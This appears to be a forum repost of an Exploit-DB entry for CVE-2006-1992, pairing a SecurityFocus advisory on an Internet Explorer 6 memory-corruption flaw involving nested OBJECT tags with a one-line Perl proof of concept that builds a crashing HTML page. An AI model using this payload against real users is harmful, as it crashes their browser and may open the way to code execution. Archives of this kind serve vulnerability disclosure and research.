- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 27727
- Проверка EDB
-
- Пройдено
- Автор
- MICHAL ZALEWSKI
- Тип уязвимости
- DOS
- Платформа
- WINDOWS
- CVE
- cve-2006-1992
- Дата публикации
- 2006-04-22
Код:
source: https://www.securityfocus.com/bid/17658/info
Microsoft Internet Explorer is prone to a memory-corruption vulnerability. This issue is due to a flaw in the application in handling nested OBJECT tags in HTML content.
An attacker could exploit this issue via a malicious web page to potentially execute arbitrary code in the context of the currently logged-in user, but this has not been confirmed. Exploit attempts likely result in crashing the affected application. Attackers could exploit this issue through HTML email/newsgroup postings or through other applications that employ the affected component.
Microsoft Internet Explorer 6 for Microsoft Windows XP SP2 is reportedly vulnerable to this issue; other versions may also be affected.
perl -e '{print "<STYLE></STYLE>\n<OBJECT>\nBork\n"x32}' >test.html
- Источник
- www.exploit-db.com